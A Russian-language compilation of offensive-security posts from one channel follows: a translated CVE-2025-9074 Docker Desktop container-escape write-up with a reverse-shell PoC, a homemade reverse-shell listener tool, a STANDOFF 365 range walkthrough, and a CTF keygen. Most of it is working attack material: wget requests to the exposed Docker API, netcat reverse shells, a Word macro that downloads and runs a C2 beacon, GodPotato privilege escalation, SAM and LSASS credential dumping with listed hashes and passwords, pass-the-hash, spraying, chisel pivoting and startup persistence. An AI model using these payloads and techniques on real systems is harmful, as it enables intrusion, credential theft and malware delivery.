Автор статьи: Philippe Dugre ("zer0x64")

Оригинал: Breaking Docker’s Isolation Using... Docker? (CVE-2025-9074)

Автор перевода: AFANX

Канал: K0N70R4

Ку, киберпанки! Мне кажется этото перевод будет полезный, потому что это отличный кейс для побега из докера на Windows системе. В кратце: CVE-2025-9074 позволяет непривилегированному коду внутри контейнера обратиться к Docker engine и запустить дополнительные привилегированные контейнеры с полным доступом к файлам на хосте. В конце статьи предоставлю PoC для получения reverse-shell.

TL;DR

Некоторое время назад мой старый друг и исследователь безопасности Феликс Буле связался со мной по поводу одной своей находки. Эта запись в блоге посвящена моему участию в анализе и тестировании уязвимости CVE-2025-9074 — критической уязвимости, позволяющей вырваться из контейнера Docker на Docker Desktop, версии Docker для Windows и macOS.

Обнаружение и подтверждение уязвимости

Феликс возился со сканированием сети из контейнера Docker, когда обнаружил открытый порт, который ему был незнаком. После небольшого исследования он выяснил, что это сокет Docker-движка, и для доступа к нему не существует системы аутентификации. Узнав, что у него есть открытый сокет, он связался со мной, поскольку у меня больше опыта в Docker'е и разработке в целом.

Первым шагом была проверка уязвимости. Конфигурация Docker весьма нестандартна, поскольку он постоянно пытается сломать программное обеспечение, поэтому ему требовалось стороннее мнение по поводу новой установки. Я стряхнул пыль со старого ноутбука, установил все обновления Windows и заново установил Docker. Я адаптировал его прототип к своей конфигурации и смог эксплуатировать уязвимость, подтвердив её наличие. Затем я протестировал её в Linux и macOS, одновременно дорабатывая код эксплойта. Оказалось, что Linux не уязвим, по причинам, которые будут обсуждаться позже, а вот macOS уязвима, хотя и с меньшим уровнем воздействия, чем Windows.

Уязвимость

Сама уязвимость довольно проста: сокет Docker Engine ни при каких обстоятельствах не должен быть доступен недоверенному коду или пользователю. Этот сокет представляет собой API управления Docker, и доступ к нему предоставляет полный доступ ко всем функциям Docker-приложения.

Очевидно, сюда входит создание и удаление контейнеров, но более коварная возможность — монтирование томов.

Предположим, что Docker Engine запускает производственное приложение, использующее базу данных, которая также работает на Docker. Злоумышленник может просто создать новый контейнер и смонтировать том базы данных, что позволит ему читать и записывать в неё любые данные.

Однако ещё более опасным вариантом применения является монтирование файловой системы хоста. Это позволяет злоумышленнику читать и записывать файлы на хосте.

В Windows, поскольку Docker Engine работает через WSL2, злоумышленник может смонтировать как администратор всю файловую систему, прочитать любой конфиденциальный файл и, в конечном итоге, перезаписать системную DLL-библиотеку, чтобы повысить свои права до администратора хост-системы.

Однако в MacOS приложение Docker Desktop по-прежнему имеет уровень изоляции, и при попытке монтирования пользовательского каталога у пользователя запрашивается разрешение. По умолчанию Docker приложение не имеет доступа к остальной файловой системе и не запускается с правами администратора, поэтому хост гораздо безопаснее, чем в случае с Windows. Однако злоумышленник по-прежнему имеет полный контроль над приложением/контейнерами Docker и может даже использовать бэкдор, смонтировав и изменив конфигурацию приложения, без необходимости одобрения пользователя.

А как насчет Linux?

Linux не использует TCP-сокет для API Docker Engine. Вместо этого используется именованный канал в файловой системе хоста. Если не используется определённая небезопасная конфигурация, контейнер не имеет доступа к этому именованному каналу. Обратите внимание, что эта уязвимость задокументирована и изначально заложена в конструкцию Docker-in-Docker, которую не следует использовать в рабочей среде именно по этой причине.

Насколько легко это эксплуатировать?

Что касается сложности эксплуатации уязвимости в идеальном сценарии, то это действительно очень легко. Для моего прототипа на MacOS мне понадобилось всего три строки кода на Python:

import docker
client = docker.DockerClient(base_url="tcp://192.168.65.7:2375")

client.containers.run("alpine", "touch /mnt/pwned",
volumes=["/Users/<username>/:/mnt"])

Это создаст файл pwned​ в домашнем каталоге пользователя. После этого можно легко изменить скрипт, чтобы использовать пакет docker python для выполнения любых функций движка. Вы также можете ознакомиться с записью в блоге Феликса об этом, чтобы увидеть его эксплойт, работающий из командной строки.

Что касается настройки, необходимой для эксплуатации уязвимости, движок должен работать либо на Windows, либо на macOS. Хотя большинство производственных систем Docker работают на Linux, некоторые используют Windows Server (особенно если им требуются контейнеры Windows). Хотя Docker — менее распространённая цель, многие разработчики запускают ненадёжный код на Windows или macOS.

Другим требованием является доступ злоумышленника к сокету Docker. Хотя самый простой способ эксплуатации уязвимости — через уязвимый или вредоносный контейнер, контролируемый злоумышленником, другой возможный вектор атаки — подделка запросов на стороне сервера (SSRF). Эта уязвимость позволяет злоумышленнику проксировать запросы через уязвимое приложение и достигают сокета Docker, влияние которого особенно различается в зависимости от доступности методов HTTP-запросов (большинство SSRF допускают только запросы GET, но некоторые узкоспециализированные случаи допускают использование методов POST, PATCH, DELETE).

Меня это коснулось?

Если вы используете Docker Desktop на Windows или macOS, обязательно обновите его до последней версии. Уязвимость была исправлена в версии 4.44.3.

Proof of Concept

Исходя из описания данной уязвимости и видео из поста решил попробовать получить Reverse Shell.

Для стенда использовал:

1. Docker Image alpine
2. Docker Desktop v.4.44.2

Прежде чем использовать docker нужно поставить WSL:

wsl --update

Теперь скачаем alpine​ и запустим его:

docker run -it alpine '/bin/sh'

​

​Автор статьи создавал файл командами ниже:

wget --header='Content-Type: application/json' \
--post-data='{"Image":"alpine","Cmd":["sh","-c","echo pwned > /host_root/pwn.txt"],"HostConfig":{"Binds":["/mnt/host/c:/host_root"]}}' \
-O - http://192.168.65.7:2375/containers/create > create.json
cid=$(cut -d'"' -f4 create.json)
wget --post-data='' -O - http://192.168.65.7:2375/containers/$cid/start

На данном этапе создаётся новый контейнер с использованием Docker API и общая директория/host_root​ , где создаётся файл pwn.txt​. При использовании bridge​ в Docker-контейнерах существует адрес обратной связи - 192.168.65.7. Этот IP-адрес прописан в контейнере и располагается в файле /etc/resolv.conf​:

По идеи всё просто - нужно заменить команду создания файла на команду для получения Reverse-Shell'а. Так как в alpine есть netcat​, то можно воспользоваться ReverseShellGenerator и получить нагрузку:

У себя запустил листенер:

nc -lvnp 4343

А нагрузка теперь выглядит так:

wget --header='Content-Type: application/json' --post-data='{"Image":"alpine","Cmd":["sh","-c","nc 192.168.1.7 4343 0>&1"],"HostConfig":{"Binds":["/mnt/host/c:/host_root"]}}' -O - http://192.168.65.7:2375/containers/create > create.json
cid=$(cut -d'"' -f4 create.json)
wget --post-data='' -O - http://192.168.65.7:2375/containers/$cid/start

Запускаю и получаю коннект:

Так как в новом контейнере общая директория это host_root​, то получается что могу спокойно ходить в файловую систему Windows:

Для полной проверки создам файл в C:/​:

И проверяю в Windows:

Ку, киберпанки! Недавно, у меня был кейс связанный с бэк-коннектом. Данный бэ-коннект я получал используя обычный реверс шелл. Ну, как бы да. Казалось бы запустил netcat на прослушку nc -lvnp 4444 или используй metasploit для этого. Однако, есть ряд проблем связанные с этим способом:

1. Челики, которые пытаюся ломануть твою ВПС. Из-за этого появляется ложный коннект и отлетает подключение
2. Много коннектов и не понятно какой ложный, отсюда теряется оперативность

Как альтернативу, можно использовать pwncat. И это реально крутая тулза для пентестов, потому что много чего умеет, но для решения своих задач мне это не нужно.

Мотивация для написания своей тулзы такая:

1. Мне необходимо делать много листенеров
2. Возможность переключаться между ними без потери соединения

Иными словами, хотел сделать очень, очень жалкую пародиб на C2 и вот результат.

Обзор оболочки

Писал утилиту на Python и для удобства скомпилил её с помощью PyInstaller . Главное меню программы выглядит так:

Представлены все команды, которые может выполнять оболочка LISTENER и на самом деле этого вполне достаточно для работы.

1. create <ip> <port> - команда для создания листенера. Разумеется, что ip - это адрес пывнера, а port - это порт для прослушивания
2. list - команда для просмотра коннектов. В данной таблице написан ID коннекта, ip-адрес пывнера и ip-адрес жертвы
3. use <id> - команда необходимая для подключения к сессии. Используется ID, который указан в list
4. kill <id> - команда необходимая для завершения сессии. Используется ID, который указан в list

Для удобства ввода команд добавлена табуляция с автодополнением

Ниже приведён пример использования команды create:

Вывод команды говорит о том, что прослушка запустилась. Теперь оформлю реверс шелл командой nc 192.168.1.3 4444 -e sh и получу информацию о коннекте:

Вот и получение информации о том, что есть подключение. На скрине видно, что отправляю команду whoami. Короче говоря, это нужно как раз таки для защиты от сканов. Я считаю, что эта команда довольно таки универсальная и есть в каждой системе. Если ответ не поступил в течении 10 секунд, то подключение ложное. Дальше происходит прерывание сессии и открытие порта по поновой.

Когда появилось уведомление о подключении лучше всего сделать так: нажать Enter, потом ввести exit, а дальше использовать команду use ID. Иными словами закрыть инерактивную оболочку и потом снова к ней подключиться. Так работает лучше.

На скрине виден результат работы команды list и use. Дальше я убью этот конект командой kill ID:

Для примера откроем порт 1337 и запустим nmap командой nmap 192.168.1.3 -p 1337 и посмотрим, что выдаст LISTENER:

Думаю, что этот скрин доказывает, что можно попробовать противостоять сканам. Однако, это метод максимально простой и естественно это нужно дорабатывать.

Теперь протестируем на Windows. Откроем порт 8080 и на Windows запущу реверс шелл:

Теперь подключусь к Linux (ID dfcf839b):

Дальше ввожу exit и переключаюсь на Windows (ID dbd494e9):

На этом всё. Исходный код и скомпиленную прогу можно найти на канале K0N70R4.

Ку, киберпанки! В прошлой статье мы получили инишиал. В этой статье речь пойдет о повышении привилегий, сборе данных на хосте, о туннелировании и закреплении.

Статья име­ет озна­коми­тель­ный харак­тер и пред­назна­чена для спе­циалис­тов по безопас­ности, про­водя­щих тес­тирова­ние в рам­ках кон­трак­та. Автор не несет ответс­твен­ности за любой вред, при­чинен­ный с при­мене­нием изло­жен­ной информа­ции. Рас­простра­нение вре­донос­ных прог­рамм, наруше­ние работы сис­тем и наруше­ние тай­ны перепис­ки прес­леду­ются по закону.

Повышение привилегий

Изначально имеем следующих зафишенных челиков:

Начнём с O_Lara. Сначала чекнем её привилегии:

whoami /priv

Видим, что есть SeImpersonatePrivilige. Это означает, что можно выполнять что-то в контексте NT AUTHORITY\SYSTEM. Для повышения привилегий использую GodPotato или SigmaPotato.

В директорию C:\Windows\Tasks\ (но лучше загрудать всю эту взрованную тематику по адресу C:\Users\user_name\) загружаю GodPotato и запускаю:

shell GodPotato.exe -cmd "C:/Windows/Tasks/a.exe"

Но по непонятным причинам причинам ничего не отрабатывало:

В итоге, сделал новый маяк, загрузил его в директорию O_Lara с помощью SigmaPotato:

shell SigmaPotato.exe C:\Users\O_Lara\demon.exe

Сбор информации

Для сбора информации - будем дампить SAM для получения кред или хэшей.

Security Account Manager (SAM) — механизм безопасности, управляющий всеми локальными учетными записями пользователей, включая их данные. Абстрактно, SAM представляет собой базу данных, содержащую информацию о локальных пользователях, такую как идентификатор, хеш пароля и т.п

При помощи привилегии SeBackupPrivilege мы можем это сделать:

По хорошему, это делается через mimikatz:

shell mimikatz "token::elevate" "lsadump::sam" "exit"

Но у меня мимик не отрабатывал, поэтому решил сделать по киберпанку: самому сдампить из реестра и на своей тачке распарсить с помощью pypykatz :

reg save HKLM\SYSTEM system.dmp & reg save HKLM\security security.dmp & reg save HKLM\SAM sam.dmp

Теперь выкачиваю и паршу. Покажу как это сделать с помощью pypykatz и с скриптом impacket secretsdump:

pypykatz registry --sam sam.dmp system.dmp

secretsdump.py  -security security.dmp -system system.dmp LOCAL

secretsdump.py -sam sam.dmp -system system.dmp LOCAL

Таким образом, получили:

Administrator:500:none:1341d22a3bf7d7caa3b46590cda30b88:::
Guest:501:none:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:none:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:none:9f510fd6ba1b078f7d342024d38aa80d:::
ptadmin:1006:none:c316674dab626a3afdc5f6b31df29c2f:::
itshuel:1007:none:6c4c4eb68a4c6082ab37166a9e967273:::
adel:1008:none:cfeff215d461385934435a5b0fc060f4:::
kot3:1009:none:33b8400f6cb308f57b2874f679e913fe:::
Olga:1011:none:303a0a69a3e7b813fbda33cba07f1bf8:::
test:1012:none:0cb6948805f797bf2a82807973b89537:::
newuser:1014:none:bbcef4ffcfe931235927d4134505691b:::
newhuy:1015:none:bbcef4ffcfe931235927d4134505691b:::
collapsz:1016:none:6252774119889224f32364297cc43416:::
nerv:1017:none:5745798f244536dfb453110e36751006:::
autist:1018:none:163b8e2cce432c92c16d84235b60ddc9:::
HTE.STF/Administrator:$DCC2$10240#Administrator#dfb35a65f92d8af602f08e358a58dc42
HTE.STF/o_lara:$DCC2$10240#o_lara#c4ee3a267ae7a808b67cd070b82f1bce
HTE.STF/a_petinson_admin:$DCC2$10240#a_petinson_admin#113cf5264ab093c52cc06dc404596dca
HTE.STF/k_delaney_admin:$DCC2$10240#k_delaney_admin#e5158fe15a7e4f2ce2d6d844652cb0fc
HTE.STF/j_bowen_admin:$DCC2$10240#j_bowen_admin#6167c7eeb879d232bad0bbee78865dcc
HTE.STF/j_glenn_admin:$DCC2$10240#j_glenn_admin#f08a98bbd5b6e57f9f7fb8f93e6776b4
HTE.STF/l_sherman:$DCC2$10240#l_sherman#210944504d230ed5b502332bba70b2b6
(Unknown User):Aa2sUdUlg3OJP98n

aad3b435b51404eeaad3b435b51404 заменил на none, потому что эта часть равна нулю

Есть хэши от юзеров, а значит можно сделать атаку Pass-The-Hash и есть пароль от неизвестного юзера, который можно будет спреить.

Pass-the-hash - техника, которая позволяет авторизовываться по хэшу, если аунтефикация происходит с использованием NTLM и LM

Но прежде чем это делать, нужно оформить туннелирование.

Pivoting

Проброс портов буду делать через chisel. С chisel нужно работа осуществляется так:

1. На тачке пывнера разворачивается сервер chisel (желательно на тачке с белым IP)
2. На тачке таргета разворачивается клиент chisel

./chisel server --port 3958  --reverse

На тачке жертвы:

shell chisel.exe client VPS_IP:3958 R:0.0.0.0:1080:socks

Теперь на своей тачке(та самая машина пывнера) прописываем в proxychains /etc/proxychains.conf:

socks5 VPS_IP 1080

или

echo "socks5 VPS_IP 1080" | sudo tee -a /etc/proxychains.conf

Проверяем доступность:

Теперь, используя пивотинг, можно попробовать еще раз сдампить lsass, используя модуль nanodump. Так мы получим список пользователей в домене и их хэши:

proxychains -q nxc smb -M nanodump 10.154.13.37 -u Administrator -H "1341d22a3bf7d7caa3b46590cda30b88"

Мы получили хэши и пароли:

hte\a_petinson_admin:7b4dc94ba597fbc95017cb313c83ab57
hte\a_petinson_admin:uDp0KD5Siu0tXAdg
hte\o_lara:3974d41c04dfff97f05090b477ceb846
hte\o_lara:Aa2sUdUlg3OJP98n

Для того, чтобы получить список пользаков через shell, можно использовать команду net user /domain:

Теперь попробуем засперить пароль Aa2sUdUlg3OJP98n , используя nxc:

proxychains -q nxc smb 10.154.13.37 -u users.txt -p "Aa2sUdUlg3OJP98n"

Это пароль от юзера o_lara. То есть, доказали, что это именно ее пароль.

Воспоминания о бывалом сервисе

Короче говоря, я пропустил один шаг в самом начале. Как помните, при скане портов была найдена станичка компании:

Попробовал ее прогнать через dirsearch и обнаружил свой косяк:

Если кратко, то там лежал VPN конфиг, который даёт доступ во внутренюю сеть - http://10.124.1.166/config. Теперь попробуем его запустить с кредами от o_lara:

Таким образом, получил доуступ во внутряк:

Теперь chisel можно отключать и работать чисто через VPN-конфиг.

Для подтверждения того, что работает - можно проверить rdp подключение к o_lara:

Подключаемся через xfreerdp:

xfreerdp3 /v:10.154.13.37 /d:hte.stf /u:o_lara /p:'Aa2sUdUlg3OJP98n' 

Так же, данный пароль подходит и для Exchange, который находили ранее:

То есть, появилась ещё одна возможность получить инишиал к другим пользакам домена через фишинг.

С помощью GAL (Global Address List) можно узнать какие пользователи есть в домене (имею ввиду без мусора):

Persistence

Совсем немного про закреп. Чтобы всегда отрабатывал маяк на SYSTEM, его можно поместить в директорию:

C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\

Заключение

В следующей части поговорим о сборе информации о домене/корпоративной сети, горизонтальном перемещении.

Ку, киберпанки! Начинаю разбор инфры HightTechEnergy STANDOFF 365 . HighTechEnergy — одна из крупнейших компаний Государства F. Занимается передачей и распределением электроэнергии, выполняет функции оператора ГЭС, СЭС и ТЭС. Главная цель организации — качественное и надежное снабжение потребителей электричеством, поэтому вопросы безопасности для нее особенно важны.

Статья име­ет озна­коми­тель­ный харак­тер и пред­назна­чена для спе­циалис­тов по безопас­ности, про­водя­щих тес­тирова­ние в рам­ках кон­трак­та. Автор не несет ответс­твен­ности за любой вред, при­чинен­ный с при­мене­нием изло­жен­ной информа­ции. Рас­простра­нение вре­донос­ных прог­рамм, наруше­ние работы сис­тем и наруше­ние тай­ны перепис­ки прес­леду­ются по закону.

В качестве C2 буду использовать:

1. Havoc
2. SLIVER

Хороший обзор на C2 SLIVER можно найти на канале Хабра AP Security

Разведка и сбор информации

Первым шагом является изучение скоупа на открытые порты, службы итд. Так же сбор информации на информационных ресурсах(имею ввиду почтовые ящики).

Дан скоуп - 10.124.1.128/26 и буду проводить два вида сканирования:

1. Через nmap - для получения информации о хостах и открытых портах
2. Через nxc - для получения информации о Windows тачках, если торчат наружу

Как бы логично, что вряд ли будут виндовые тачки торчать на ружу, но попробовать стоило:

nxc smb 10.124.1.128/26

Теперь скан с помощью nmap:

nmap -sC -sV -A 10.124.1.128/26 -oN high_tech_nmap.log

Такой вид скана плохой, потому что очень сильно шумит, но для соревнований пойдет:

Первый хост 10.124.1.139 - это копроративная почта MS Exchange:
порт 80 - HTTP и подразумевается, что это вебсервис
порт 443 - HTTPS, в которой видно, что это Exchange и в /etc/hosts можно добавить хост и в будущем пробовать атаку ClusterBomb для получения доступа на Exchange. Если получим доступ к почте, то так же получим доступ к тачке в домене.

ClusterBomb - эта атака перебирает разные наборы полезных данных для каждой определенной позиции. Полезные нагрузки размещаются из каждого набора по очереди, чтобы протестировались все комбинации полезных нагрузок.

Второй хост 10.124.1.166 :
порт 80 - HTTP и это веб-сервис и работает на nginx 1.22.1
порт 22 - SSH

Третий хост 10.124.1.176 содержит порты:
порт 22 - SSH
порт 53 - это порт DNS

Четвертый хост 10.124.1.189, который содержит только веб-сервис на порту 443 - HTPPS

Теперь про сбор информации. Довольно ценным источником данных при подготовке к пентесту компании являются социальные сети, на страницах которых можно найти довольно большой объём информации о сотрудниках и оргструктуре.

На хосте 10.124.1.166 можно найти почты сотрудников:

s_boyle@hte.stf
o_lara@hte.stf
j_miles@hte.stf

На данные почтовые ящики можно отправить фишинговое письмо и попробовать авторизоваться на MS Exchage.

Cluster Bomb

Данную атаку можно производить с помощью BurpSuite и с помощью опен сорса ruler. Я буду юзать первый вариант, потому что он удобнее и быстрее отрабатывает.

Ввел значения в фому авторизации login:password:

Ловлю запрос и перехожу в Intruder:

В Intruder захватываю поля login и password - это то, что будем перебирать:

Выбираю атаку Cluster Bomb:

В первый сет ставлю почты:

Во второй passlist, который был дан:

Запускаю атаку и результата, к сожалению, нет:

Но это не беда, на самом деле. Этих челиков можно зафишить.

Фишинг

Для фишинга на STANDOFF 365 у нас есть почтовый клиент Roundcube:

Теперь необходимо сделать маяк на Havoc и создать вредоносный макрос.

В Havoc выбираю Listeners и создаю порт для прослушивания соединения:

В Hosts указываю IP-адрес сервера C2, порт тоже желательно сменить с 443 на любой другой:

В итоге видим, что листенер упешно завелся:

Далее создаем маяк:

Всё оставляю по дефолту и жмякаю Generate:

После успешной генерации бекона, будет вот такое окно:

Теперь его необходимо перенести на свою VPS, где развернут C2 сервер и открыть в директории, где он расположен, python HTTP-сервер:

python3 -m http.server 4879

Далее создаем макрос. Макрос будет выглядить так:

Sub Document_Open()
 Dim strProgramName As String
 Dim strArgument As String
 strProgramName = "powershell.exe"
 strArgument = "wget  http://IP:PORT/agent.exe -O C:\Windows\Tasks\a.exe ; C:\Windows\Tasks\a.exe"
 Call Shell("""" & strProgramName & """ """ & strArgument & """", vbNormalFocus)
End Sub

В кратце, он скачивает бекон и сохраняет в директорию C:\Windows\Tasks и запускает. Однако, может быть такая ситуация, что на компе не будет wget, тогда можно использовать системную утилиту certutil.exe:

Sub Document_Open()
 Dim strProgramName As String
 Dim strArgument As String
 strProgramName = "powershell.exe"
 strArgument = "certutil.exe -urlcache -f http://IP:PORT/40564.exe C:\Windows\Tasks\bad.exe ; C:\Windows\Tasks\a.exe"
 Call Shell("""" & strProgramName & """ """ & strArgument & """", vbNormalFocus)
End Sub

Посмореть как этот метод отрабатывает можно здесь.

Когда зашёл в Word нужно нажать комбинацию Alt+F11 для получения доступа к редактирования макрсов:

Нажимаем на ThisDocument и попадём в окно редактирования макросов:

Сохраняем его в формате doc 97-2003:

Далее вставляем макрос:

После сохранения закрываем и опять открываем документ и разрешаем запуск:

Таким образом, макрос будет запускаться при открытии:

Далее необходимо отправить письмо жертвам:

Как можно увидеть, данный комп является локальным админом:

На этом всё. В следующей части будет сбор информации о пользователе и сети, повышение привилегий, закреп и туннелирование.

tg: AFANX
канал: K0N70R4
GitHub: GitHub

Ку, киберпанки. Сегодня будет разбор на один интересный таск с CTF, который был на этих выходных. В таске встретите защиту от дизассемблирования и необходимость написания кейгена, а также реверс программы, которая написана на Golang. Сам таск отнесу в категорию easy.

Изучаем прогу

Закинем в DiE (Detect It Easy) и посмотрим стороки, энтрипоинт, обфусцирован ли он, на чём написал и чем скомпилен:

Наш энтрипоинт располагается по адресу 0xA9BB40 и этот бинарь написан на Golang, что не есть хорошо. Это плохо, потому что Go компилирует всё статически и оставляет очень много мусора. Теперь попробуем закинуть в IDA Pro и посмотреть, что под капотом. Во время трассировки, я думал, что у меня комп взлетит и понятно почему:

С каждой секундой он находил новую функцию и не мог быстро трассировать. Сразу стало ясно, что это защита от дизассемблирования.

Обходим защиту от дизассемблирования

IDA и GHIDRA не справились с задачей дизассемблирования, поэтому решил сделать это через objdump:

objdump -A memes.exe -M intel

Как видите много одних и тех же инструкций, причем они все ссылаются друг на друга. Короче говоря, это такая защита от дизассемлирования. Последняя интсрукция указывает на ту, которая в начале, а самая первая на следующую. По DiE знаем, что энтрипоинт по адресу 0xa9bb40, т.е.

a9bb40:	e9 f6 ff ff ff       	jmp    0xa9bb3b

Заполнить всё это NOPами (0x90) можно, только получим чисто дизассемблирования, а нам нужна еще отладка. Посмотрим чем всё это заканчивается:

Теперь посмотрим, что находится по адресу 0x46d9e0:

Это уже похоже на нормальный энтрипоит и на загрузку проги. Таким образом, необходимо запатчить прогу так:

1. Все jmp заменить на nop
2. Первый jmp сделать на адрес 0x46A140

После таких патчей сможем избавиться от защиты от дизассемблирования и нормально отлаживать программу.

Патчим

В HxD нахожу первую инструкцию по байтам E9 F6 FF FF FF :

После этого заменил всё, до первой такой инструкции (энтипоинт 0xA9BB40):

Так как, теперь это хорошо открывается в IDA, патчинг закончу там.

Вот мой энтрипоинт:

Патчим на интересующий нас адрес - 0x46A140.

Теперь можно поставить точку останова на main и начать реверсить!

Реверс

В начале есть интересная функция под названием main_keygen. Она формирует ключ шифрования.

В начале есть такой блок кода:

Это зашифрованный ключ в hex'ах. Расшифровывается так:

Первый шаг - побайтный XOR с 0x66

Второй шаг - побайтный XOR с 0x99

Третий шаг - побайтный XOR с 0x37

Таким образом, получим такой ключ:

В памяти видим, что две одинаковые строки, но это нужно будет для дальнейшего шифорвания.

Дальше обращаем внимание на следующих блок:

Это наш зашифрованный флаг, который будет побайтно сравниваться с нашей строкой.

Само шифрование происходит в функции main_generator:

В main_generator строка проходит пять этапов шифрования:

Первый шаг - каждый байт ксорится с ключём encr7pt1on_k3yencr7pt1on_k3y

Второй шаг - каждый байт ксорится по кругу с захардкоженными значениями 0xE5, 0x99, 0xB3:

Третий шаг - каждый байт складывается с 0x65:

Четвертый шаг - каждый байт складывается с 0x7D:

Последний шаг - каждый байт ксорится с другими захардкоженными значениями 0xE8,0x90,0xB6:

После выхода из функции будет сравнение длины введенной строки с длиной флага. Длина должна быть равна 28 и происходит сравнение строк:

После реверса становится ясно, что без написания кейгена будет сложно расшифровать флаг, да и к тому же все операции обратимы.

Пишем кейген

Для тестирования взял такую строку: ABCDEFGHIJKLMNOPQRSTUVWXYZ{}.

Первым шагом был ксор строки с ключом encr7pt1on_k3yencr7pt1on_k3y:

for i in range(len(test)):
	print(hex(ord(test[i]) ^ ord(key[i])),end=" ")
	res_1.append(ord(test[i]) ^ ord(key[i]))

Дальше ксор с захардкоженными значениями:

round_key_2 = [0xE5, 0x99, 0xB3]
for i in range(len(res_1)):
	print(hex(res_1[i] ^ round_key_2[i%3]),end=" ")
	res_2.append(res_1[i] ^ round_key_2[i%3])

После сложение с 0x65 и 0x7d:

for i in range(len(res_2)):
	print(hex((((res_2[i] + 0x65)%0x100) + 0x7D)%0x100),end=" ")
	res_3.append((res_2[i] + 0x65)%0x100) 

Последний шаг - ксор со вторыми захардкоженными значениями:

round_key_3 = [0xE8, 0x90, 0xB6]
for i in range(len(res_4)):
	print(hex(res_4[i] ^ round_key_3[i%3]),end=" ")
	res_5.append(res_4[i] ^ round_key_3[i%3])

Таким образом, полный алгоритм шифрования выглядит так:

test = "ABCDEFGHIJKLMNOPQRSTUVWXYZ{}"
key = "encr7pt1on_k3yencr7pt1on_k3y"
round_key_2 = [0xE5, 0x99, 0xB3]
round_key_3 = [0xE8, 0x90, 0xB6]

res_1 = []
res_2 = []
res_3 = []
res_4 = []
res_5 = []

print("ROUND 1")
# round 1
for i in range(len(test)):
	print(hex(ord(test[i]) ^ ord(key[i])),end=" ")
	res_1.append(ord(test[i]) ^ ord(key[i]))

#round 2
print("")
print("ROUND 2")
for i in range(len(res_1)):
	print(hex(res_1[i] ^ round_key_2[i%3]),end=" ")
	res_2.append(res_1[i] ^ round_key_2[i%3])

#round 3
print("")
print("ROUND 3")
for i in range(len(res_2)):
	print(hex((res_2[i] + 0x65)%0x100),end=" ")
	res_3.append((res_2[i] + 0x65)%0x100)

#round 4
print("")
print("ROUND 4")
for i in range(len(res_3)):
	print(hex((res_3[i] + 0x7D)%0x100),end=" ")
	res_4.append((res_3[i] + 0x7D)%0x100)

#round 5
print("")
print("ROUND 5")
for i in range(len(res_4)):
	print(hex(res_4[i] ^ round_key_3[i%3]),end=" ")
	res_5.append(res_4[i] ^ round_key_3[i%3])


print("\n")
print("RESULT")
for i in res_5:
	print(hex(i), end=" ")

Выводит следующее:

И проверим, что выведет бинарь:

Получили тоже самое. Теперь осталось это всё обратить и получим флаг.

Кейген выглядит так:

flag = [0x20,0xed,0x25,0x3a,0x27,0x30,0x6b,0x49,0x79,0x32,0x1a,0x38,0x83,0xe5,0x2b,0x29,0xe4,0x36,0x70,0x2a,0x35,0x7c,0x39,0x16,0x59,0x10,0x2f,0x2b]

key = "encr7pt1on_k3yencr7pt1on_k3y"
round_key_2 = [0xE5, 0x99, 0xB3]
round_key_3 = [0xE8, 0x90, 0xB6]

res_1 = []
res_2 = []
res_3 = []
res_4 = []
res_5 = []

for i in range(len(flag)):
	print(hex(flag[i] ^ round_key_3[i%3]),end=" ")
	res_1.append(flag[i] ^ round_key_3[i%3])

for i in range(len(res_1)):
	print(hex((res_1[i] - 0x7D)%0x100),end=" ")
	res_2.append((res_1[i] - 0x7D)%0x100)

for i in range(len(res_2)):
	print(hex((res_2[i] - 0x65)%0x100),end=" ")
	res_3.append((res_2[i] - 0x65)%0x100)

for i in range(len(res_1)):
	print(hex(res_3[i] ^ round_key_2[i%3]),end=" ")
	res_4.append(res_3[i] ^ round_key_2[i%3])

for i in range(len(res_4)):
	print(hex(res_4[i] ^ ord(key[i])),end=" ")
	res_5.append(chr(res_4[i] ^ ord(key[i])))

print("\n\n")
for i in res_5:
    print(i,end="")